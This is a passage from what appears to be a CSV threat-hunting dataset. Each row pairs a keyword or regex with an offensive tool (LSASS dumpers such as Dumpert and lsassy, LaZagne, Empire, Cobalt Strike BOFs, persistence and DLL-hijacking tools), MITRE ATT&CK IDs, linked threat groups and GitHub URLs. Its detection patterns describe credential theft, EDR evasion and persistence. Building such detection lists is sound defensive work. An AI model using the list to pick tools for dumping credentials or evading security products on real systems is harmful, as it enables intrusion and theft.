combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","41670" "*Dumpert.git*",".{0,1000}Dumpert\.git.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. 
This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","41671" "*dumpert.py*",".{0,1000}dumpert\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","41672" "*dumpert_path=*",".{0,1000}dumpert_path\=.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","41673" "*Dumpert-Aggressor*",".{0,1000}Dumpert\-Aggressor.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","41674" "*Dumpert-Aggressor*",".{0,1000}Dumpert\-Aggressor.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","41675" "*dumpertdll*",".{0,1000}dumpertdll.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","41676" "*Dumpert-DLL*",".{0,1000}Dumpert\-DLL.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","41677" "*dumpertdll.py*",".{0,1000}dumpertdll\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","41678" "*-DumpForest *",".{0,1000}\-DumpForest\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","41679" "*Dumping cached domain logon information *",".{0,1000}Dumping\scached\sdomain\slogon\sinformation\s.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - 
TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","41680" "*Dumping Domain Credentials (*",".{0,1000}Dumping\sDomain\sCredentials\s\(.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","41681" "*Dumping LSASS memory with MiniDumpWriteDump on PssCaptureSnapShot*",".{0,1000}Dumping\sLSASS\smemory\swith\sMiniDumpWriteDump\son\sPssCaptureSnapShot.{0,1000}","offensive_tool_keyword","ATPMiniDump","Dumping LSASS memory with MiniDumpWriteDump on PssCaptureSnapShot to evade WinDefender ATP credential-theft. Take a look at this blog post for details. ATPMiniDump was created starting from Outflank-Dumpert then big credits to @Cneelis","T1003 - T1005 - T1055 - T1218","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/b4rtik/ATPMiniDump","1","0","#content","N/A","N/A","3","255","46","2019-12-02T15:01:22Z","2019-11-29T19:49:54Z","41682" "*dumping passwords from %s (pid:*",".{0,1000}dumping\spasswords\sfrom\s\%s\s\(pid\:.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#content","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","41683" "*DumpKernel-S1.ps1*",".{0,1000}DumpKernel\-S1\.ps1.{0,1000}","offensive_tool_keyword","DumpKernel-S1.ps1","SentinelHelper to perform a live kernel dump in a Windows environment","T1055 - T1003 - T1112","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://gist.github.com/adamsvoboda/8f29e09d74b73e1dec3f9049c4358e80","1","1","N/A","N/A","10","8","N/A","N/A","N/A","N/A","41684" "*dumplsass*",".{0,1000}dumplsass.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","41685" "*DumpLSASS-main.zip*",".{0,1000}DumpLSASS\-main\.zip.{0,1000}","offensive_tool_keyword","DumpLSASS","Lsass dumping tool - 50 ways of dumping lsass","T1003.001 - T1055.001 - T1620","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/elementalsouls/DumpLSASS","1","1","N/A","N/A","10","1","33","5","2024-02-27T11:25:11Z","2023-04-09T12:11:10Z","41686" "*dumpmethod.dumpert*",".{0,1000}dumpmethod\.dumpert.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. 
an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#content","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","41687" "*DumpNParse-main.zip*",".{0,1000}DumpNParse\-main\.zip.{0,1000}","offensive_tool_keyword","DumpNParse","A Combination LSASS Dumper and LSASS Parser","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/icyguider/DumpNParse","1","1","N/A","N/A","10","2","150","24","2021-11-21T14:25:24Z","2021-11-21T14:18:42Z","41688" "*dumpntlm.py*",".{0,1000}dumpntlm\.py.{0,1000}","offensive_tool_keyword","BloodHound","A Python based ingestor for BloodHound","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","1","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","41689" "*DumpNTLMInfo.py*",".{0,1000}DumpNTLMInfo\.py.{0,1000}","offensive_tool_keyword","conpass","Continuous password spraying tool","T1110.001 - T1110 - T1078.001 - T1201","TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://github.com/login-securite/conpass","1","1","N/A","N/A","10","2","181","17","2025-03-03T15:05:25Z","2022-12-15T18:03:42Z","41690" 
"*DumpNTLMInfo.py*",".{0,1000}DumpNTLMInfo\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","41691" "*DumpPEFromMemory.cpp*",".{0,1000}DumpPEFromMemory\.cpp.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","41692" "*DumpPEFromMemory.exe*",".{0,1000}DumpPEFromMemory\.exe.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","41693" "*DumpPEFromMemoryMemory.exe*",".{0,1000}DumpPEFromMemoryMemory\.exe.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native 
EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","41694" "*DumpSAM.ps1*",".{0,1000}DumpSAM\.ps1.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","41696" "*DumpShellcode.*",".{0,1000}DumpShellcode\..{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","41697" "*DumpShellcode.exe*",".{0,1000}DumpShellcode\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - 
Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","N/A","2","140","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z","41698" "*DumpShellcode\*",".{0,1000}DumpShellcode\\.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","41699" "*DumpSMSAPassword*",".{0,1000}DumpSMSAPassword.{0,1000}","offensive_tool_keyword","BloodHound","an adversary with local admin access to an AD-joined computer can dump the cleartext password from LSA secrets of any sMSAs installed on this computer","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","AD Enumeration","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","41700" "*dumpVaultCredentials.py*",".{0,1000}dumpVaultCredentials\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. 
a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","41701" "*dumpXor.exe *",".{0,1000}dumpXor\.exe\s.{0,1000}","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - 
Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/seventeenman/CallBackDump","1","0","N/A","N/A","10","10","549","76","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z","41702" "*dumpy.exe --dump*",".{0,1000}dumpy\.exe\s\-\-dump.{0,1000}","offensive_tool_keyword","Dumpy","Reuse open handles to dynamically dump LSASS","T1003.001 - T1055.001 - T1083","TA0006","N/A","N/A","Credential Access","https://github.com/Kudaes/Dumpy","1","0","N/A","N/A","10","3","243","24","2024-04-04T07:42:26Z","2021-10-13T21:54:59Z","41703" "*DyeKuu/DNS-Hijacking*",".{0,1000}DyeKuu\/DNS\-Hijacking.{0,1000}","offensive_tool_keyword","DNS-Hijacking","DNS Hijacking in UNIX/Linux System by using raw socket and pcap","T1496 - T1040 - T1071.004 - T1090","TA0040 - TA0002 - TA0009","N/A","Sea Turtle","Sniffing & Spoofing","https://github.com/DyeKuu/DNS-Hijacking","1","1","#linux","N/A","9","1","5","2","2020-05-31T23:03:34Z","2020-05-02T08:49:22Z","41712" "*Dynamically convert a native PE to PIC shellcode*",".{0,1000}Dynamically\sconvert\sa\snative\sPE\sto\sPIC\sshellcode.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","41713" 
"*dynasty_rce/rce.php*",".{0,1000}dynasty_rce\/rce\.php.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","41714" "*DynastyPersist-main.zip*",".{0,1000}DynastyPersist\-main\.zip.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","41715" "*Dyn-NetClone|x64*",".{0,1000}Dyn\-NetClone\|x64.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","41716" "*Dyn-PyClone|Win32*",".{0,1000}Dyn\-PyClone\|Win32.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","41717" "*-e --enumerate google*github*k8s --github-only-org --k8s-get-secret-values --gcp-get-secret-values*",".{0,1000}\-e\s\-\-enumerate\sgoogle.{0,1000}github.{0,1000}k8s\s\-\-github\-only\-org\s\-\-k8s\-get\-secret\-values\s\-\-gcp\-get\-secret\-values.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/carlospolop/PurplePanda","1","0","N/A","N/A","N/A","7","687","83","2025-04-14T16:23:50Z","2022-01-01T12:10:40Z","41718" "*-e localtonet.service*",".{0,1000}\-e\slocaltonet\.service.{0,1000}","offensive_tool_keyword","localtonet","LocaltoNet is a reverse proxy that enables you to expose your localhost services to the internet","T1090 - T1102 - T1071 - T1105","TA0010 - TA0011 - TA0009 - TA0003 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/engineseller/localtonet","1","0","N/A","N/A","10","1","6","4","2022-01-31T03:19:25Z","2022-01-31T03:17:18Z","41719" "*-e ZQBjAGgAbwAgAEcAbwBkACAAQgBsAGUAcwBzACAAWQBvAHUAIQA=*",".{0,1000}\-e\sZQBjAGgAbwAgAEcAbwBkACAAQgBsAGUAcwBzACAAWQBvAHUAIQA\=.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","0","#base64","N/A","10","7","615","90","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z","41720" 
"*e00489f1e9416d9d857d35b22e5e9ad23b6afdadc0da7bc3687df67c49e870c0*",".{0,1000}e00489f1e9416d9d857d35b22e5e9ad23b6afdadc0da7bc3687df67c49e870c0.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","41721" "*e01bd0e0c7ea9278a4047c18f464e01e8c4e0d48323bca3a273cd60ff3ed78e1*",".{0,1000}e01bd0e0c7ea9278a4047c18f464e01e8c4e0d48323bca3a273cd60ff3ed78e1.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/gsmith257-cyber/better-sliver","1","0","#filehash","N/A","10","10","98","10","2024-07-22T12:32:16Z","2023-12-12T02:04:36Z","41724" "*e01dc0dc7863c3603c388e7a0629420dea1d437cefe6f385829054589d58e913*",".{0,1000}e01dc0dc7863c3603c388e7a0629420dea1d437cefe6f385829054589d58e913.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection 